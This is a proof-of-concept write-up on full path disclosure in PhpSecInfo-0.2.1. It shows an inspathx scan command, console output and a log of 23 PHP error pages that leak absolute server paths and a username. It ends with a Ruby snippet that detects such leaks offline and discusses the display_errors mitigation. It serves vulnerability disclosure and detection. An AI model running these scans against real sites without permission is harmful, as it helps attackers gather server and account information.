Inspathx/PoC1
PoC #1: PhpSecInfo-0.2.1
Description
PhpSecInfo provides an equivalent to the phpinfo() function that reports security information about the PHP environment, and offers suggestions for improvement. It is not a replacement for secure development techniques, and does not do any kind of code or app auditing, but can be a useful tool in a multilayered security approach.
At the time of this writing, the latest available version (0.2.1) suffers from full path disclosure. The scripts under Test/ are reachable directly from the web root; when one of them is requested on its own, its require_once() of a sibling file (for example PhpSecInfo/Test/Test.php) fails because the library's include path is not set up, and with display_errors enabled PHP prints a warning and a fatal error that contain the absolute filesystem path of the script. In the run below that path is /home/attacker/public_html/phpsecinfo/..., which reveals both the document root and the system username. No parameters are needed; a plain GET of each URL is enough. Setting display_errors=Off (and logging errors instead) hides the message from the client but does not stop the scripts from being requested directly.
This section shows the results of an Inspathx run against PhpSecInfo-0.2.1.
Inspathx output
$ ruby inspathx.rb -d paths_vuln/PhpSecInfo -u http://localhost/phpsecinfo

=============================================================
Path Discloser (a.k.a inspathx) / Error Hunter
(c) Aung Khant, aungkhant[at]yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/
svn co http://inspathx.googlecode.com/svn/trunk/ inspathx
=============================================================

# target: http://localhost/phpsecinfo/
# source: paths_vuln/PhpSecInfo
# log file: localhost_phpsecinfo_.log
# follow redirect: false
# null cookie: false
# total threads: 10
# time: 07:45:39 01-31-2011

[*] http://localhost/phpsecinfo/Test/Test_Session.php
[*] http://localhost/phpsecinfo/Test/Test_Curl.php
[*] http://localhost/phpsecinfo/Test/Test_Core.php
[*] http://localhost/phpsecinfo/Test/Test_Cgi.php
[*] http://localhost/phpsecinfo/Test/Test.php
[*] http://localhost/phpsecinfo/Test/Session/save_path.php
[*] http://localhost/phpsecinfo/Test/Session/use_trans_sid.php
[*] http://localhost/phpsecinfo/Test/Core/upload_tmp_dir.php
[*] http://localhost/phpsecinfo/Test/Core/uid.php
[*] http://localhost/phpsecinfo/Test/Core/register_globals.php
[*] http://localhost/phpsecinfo/Test/Core/post_max_size.php
[*] http://localhost/phpsecinfo/Test/Core/upload_max_filesize.php
[*] http://localhost/phpsecinfo/Test/Curl/file_support.php
[*] http://localhost/phpsecinfo/Test/Core/open_basedir.php
[*] http://localhost/phpsecinfo/Test/Core/memory_limit.php
[*] http://localhost/phpsecinfo/Test/Core/gid.php
[*] http://localhost/phpsecinfo/Test/Core/magic_quotes_gpc.php
[*] http://localhost/phpsecinfo/Test/Core/file_uploads.php
[*] http://localhost/phpsecinfo/Test/Core/expose_php.php
[*] http://localhost/phpsecinfo/Test/Core/allow_url_fopen.php
[*] http://localhost/phpsecinfo/Test/Core/display_errors.php
[*] http://localhost/phpsecinfo/Test/Core/allow_url_include.php
[*] http://localhost/phpsecinfo/Test/CGI/force_redirect.php

# waiting for child threads to finish ..
....
! Username detected = attacker
# vulnerable url(s) = 23
# total requests = 84
# done at 07:48:43 01-31-2011

Send bugs, suggestions, contributions to inspathx[at]yehg.net
Log file
# Logfile created on Mon Jan 31 07:45:39 +0100 2011 by logger.rb/22285
I, [2011-01-31 07:45:39 pid:#9705] INFO -- : TargetURL: http://localhost/phpsecinfo/
I, [2011-01-31 07:45:39 pid:#9705] INFO -- : Source: paths_vuln/PhpSecInfo
I, [2011-01-31 07:45:39 pid:#9705] INFO -- : Settings: follow redirect: false,null cookie: false, total threads: 10
I, [2011-01-31 07:45:39 pid:#9705] INFO -- : Date: 07:45:39 01-31-2011
I, [2011-01-31 07:46:48 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Test_Session.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Session.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Session.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:46:49 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Test_Curl.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Curl.php</b> on line <b>12</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Curl.php</b> on line <b>12</b><br />
[/html_source]
I, [2011-01-31 07:46:49 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Test_Core.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Core.php</b> on line <b>12</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Core.php</b> on line <b>12</b><br />
[/html_source]
I, [2011-01-31 07:46:49 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Test_Cgi.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Cgi.php</b> on line <b>12</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Cgi.php</b> on line <b>12</b><br />
[/html_source]
I, [2011-01-31 07:46:59 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Test.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/PhpSecInfo.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Test.php</b> on line <b>12</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/PhpSecInfo.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Test.php</b> on line <b>12</b><br />
[/html_source]
I, [2011-01-31 07:47:00 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Session/save_path.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Session.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Session/save_path.php</b> on line <b>12</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Session.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Session/save_path.php</b> on line <b>12</b><br />
[/html_source]
I, [2011-01-31 07:47:00 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Session/use_trans_sid.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Session.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Session/use_trans_sid.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Session.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Session/use_trans_sid.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:47:10 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/upload_tmp_dir.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/upload_tmp_dir.php</b> on line <b>12</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/upload_tmp_dir.php</b> on line <b>12</b><br />
[/html_source]
I, [2011-01-31 07:47:10 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/uid.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/uid.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/uid.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:47:10 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/register_globals.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/register_globals.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/register_globals.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:47:11 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/post_max_size.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/post_max_size.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/post_max_size.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:47:11 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/upload_max_filesize.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/upload_max_filesize.php</b> on line <b>12</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/upload_max_filesize.php</b> on line <b>12</b><br />
[/html_source]
I, [2011-01-31 07:47:13 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Curl/file_support.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Curl.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Curl/file_support.php</b> on line <b>12</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Curl.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Curl/file_support.php</b> on line <b>12</b><br />
[/html_source]
I, [2011-01-31 07:47:23 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/open_basedir.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/open_basedir.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/open_basedir.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:47:23 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/memory_limit.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/memory_limit.php</b> on line <b>15</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/memory_limit.php</b> on line <b>15</b><br />
[/html_source]
I, [2011-01-31 07:47:23 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/gid.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/gid.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/gid.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:47:24 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/magic_quotes_gpc.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/magic_quotes_gpc.php</b> on line <b>14</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/magic_quotes_gpc.php</b> on line <b>14</b><br />
[/html_source]
I, [2011-01-31 07:47:24 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/file_uploads.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/file_uploads.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/file_uploads.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:47:24 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/expose_php.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/expose_php.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/expose_php.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:47:37 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/allow_url_fopen.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/allow_url_fopen.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/allow_url_fopen.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:47:38 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/display_errors.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/display_errors.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/display_errors.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:47:38 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/allow_url_include.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/allow_url_include.php</b> on line <b>13</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/allow_url_include.php</b> on line <b>13</b><br />
[/html_source]
I, [2011-01-31 07:47:38 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/CGI/force_redirect.php
[html_source]
<br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Cgi.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/CGI/force_redirect.php</b> on line <b>12</b><br />
<br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Cgi.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/CGI/force_redirect.php</b> on line <b>12</b><br />
[/html_source]
I, [2011-01-31 07:48:43 pid:#9705] INFO -- : ! Username detected = attacker
I, [2011-01-31 07:48:43 pid:#9705] INFO -- : Vulnerable url(s) = 23
I, [2011-01-31 07:48:43 pid:#9705] INFO -- : Total requests = 84
I, [2011-01-31 07:48:43 pid:#9705] INFO -- : Generated by inspathx, path disclosure finder tool
I, [2011-01-31 07:48:43 pid:#9705] INFO -- : by Aung Khant, http://yehg.net/lab
I, [2011-01-31 07:48:43 pid:#9705] INFO -- : Send bugs, suggestions, contributions to inspathx[at]yehg.net
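The log above shows what a path disclosure finder actually keys on: PHP's HTML-formatted error text ("... in <b>/absolute/path.php</b> on line <b>N</b>") and, inside the leaked path, the /home/<user>/ component that gives away a system account. The Ruby below is an added example, not inspathx's own code or part of PhpSecInfo: it runs that detection logic offline over a few constructed response bodies modelled on the log entries (one leaking, one blank as a server with display_errors=Off would return, one normal page), and it generalises the username check to any /home/<user>/ path rather than the single host seen here. Function names, the sample bodies and the output layout are this example's own assumptions.

```ruby
# Added example (not part of inspathx or PhpSecInfo): detect PHP full-path
# disclosure in HTTP response bodies and derive the system username from
# any leaked /home/<user>/ path, the same observation a scanner makes.

# PHP with html_errors=On renders errors as "... in <b>/abs/path.php</b> on line <b>13</b>".
# Only absolute paths (leading "/") are accepted so ordinary text is not matched.
PHP_ERROR_PATH = %r{in <b>(/[^<]+?)</b> on line <b>(\d+)</b>}

# Unix home-directory convention: the account name is the component after /home/.
HOME_USER = %r{\A/home/([^/]+)/}

# Returns an array of {path:, line:} hashes, one per distinct leaked location.
def disclosed_paths(html)
  html.scan(PHP_ERROR_PATH).map { |path, line| { path: path, line: line.to_i } }.uniq
end

# Returns the first username found in a /home/<user>/... path, or nil if none.
def username_from_paths(paths)
  paths.each do |entry|
    m = HOME_USER.match(entry[:path])
    return m[1] if m
  end
  nil
end

# Scans a Hash of url => response body. Bodies with no PHP error text are
# treated as not vulnerable; the result mirrors the summary inspathx prints.
def scan_responses(responses)
  vulnerable = {}
  responses.each do |url, body|
    found = disclosed_paths(body)
    vulnerable[url] = found unless found.empty?
  end
  {
    vulnerable: vulnerable,
    vulnerable_count: vulnerable.size,
    username: username_from_paths(vulnerable.values.flatten)
  }
end

# Constructed sample responses (not captured from a live host), modelled on the
# warning/fatal-error pair PhpSecInfo-0.2.1 emits when a Test/ script is requested directly.
SAMPLE_RESPONSES = {
  'http://localhost/phpsecinfo/Test/Core/uid.php' =>
    "<br />\n<b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) " \
    "[<a href='function.require-once'>function.require-once</a>]: failed to open stream: " \
    "No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/uid.php</b> " \
    "on line <b>13</b><br />\n<br />\n<b>Fatal error</b>: require_once() [<a href='function.require'>" \
    "function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' " \
    "(include_path='.:/usr/lib/php:/usr/local/lib/php') in " \
    "<b>/home/attacker/public_html/phpsecinfo/Test/Core/uid.php</b> on line <b>13</b><br />",
  # Same failing script on a server with display_errors=Off: the body comes back empty.
  'http://localhost/phpsecinfo/Test/Core/gid.php' => '',
  # A page that renders normally and leaks nothing.
  'http://localhost/phpsecinfo/index.php' => '<html><body>PhpSecInfo</body></html>'
}

if __FILE__ == $PROGRAM_NAME
  result = scan_responses(SAMPLE_RESPONSES)
  result[:vulnerable].each do |url, paths|
    puts "[*] #{url} -> #{paths.map { |p| p[:path] }.uniq.join(', ')}"
  end
  puts "! Username detected = #{result[:username]}" if result[:username]
  puts "# vulnerable url(s) = #{result[:vulnerable_count]}"
end
```

Run it with `ruby fpd_check.rb`; only the uid.php sample is reported, and the username comes out as "attacker" because the first leaked path starts with /home/attacker/. The blank body illustrates why turning display_errors off stops this particular finding: the require_once() still fails, but nothing is written back to the client for the regex to match, so the check is only as good as the server's error-output configuration.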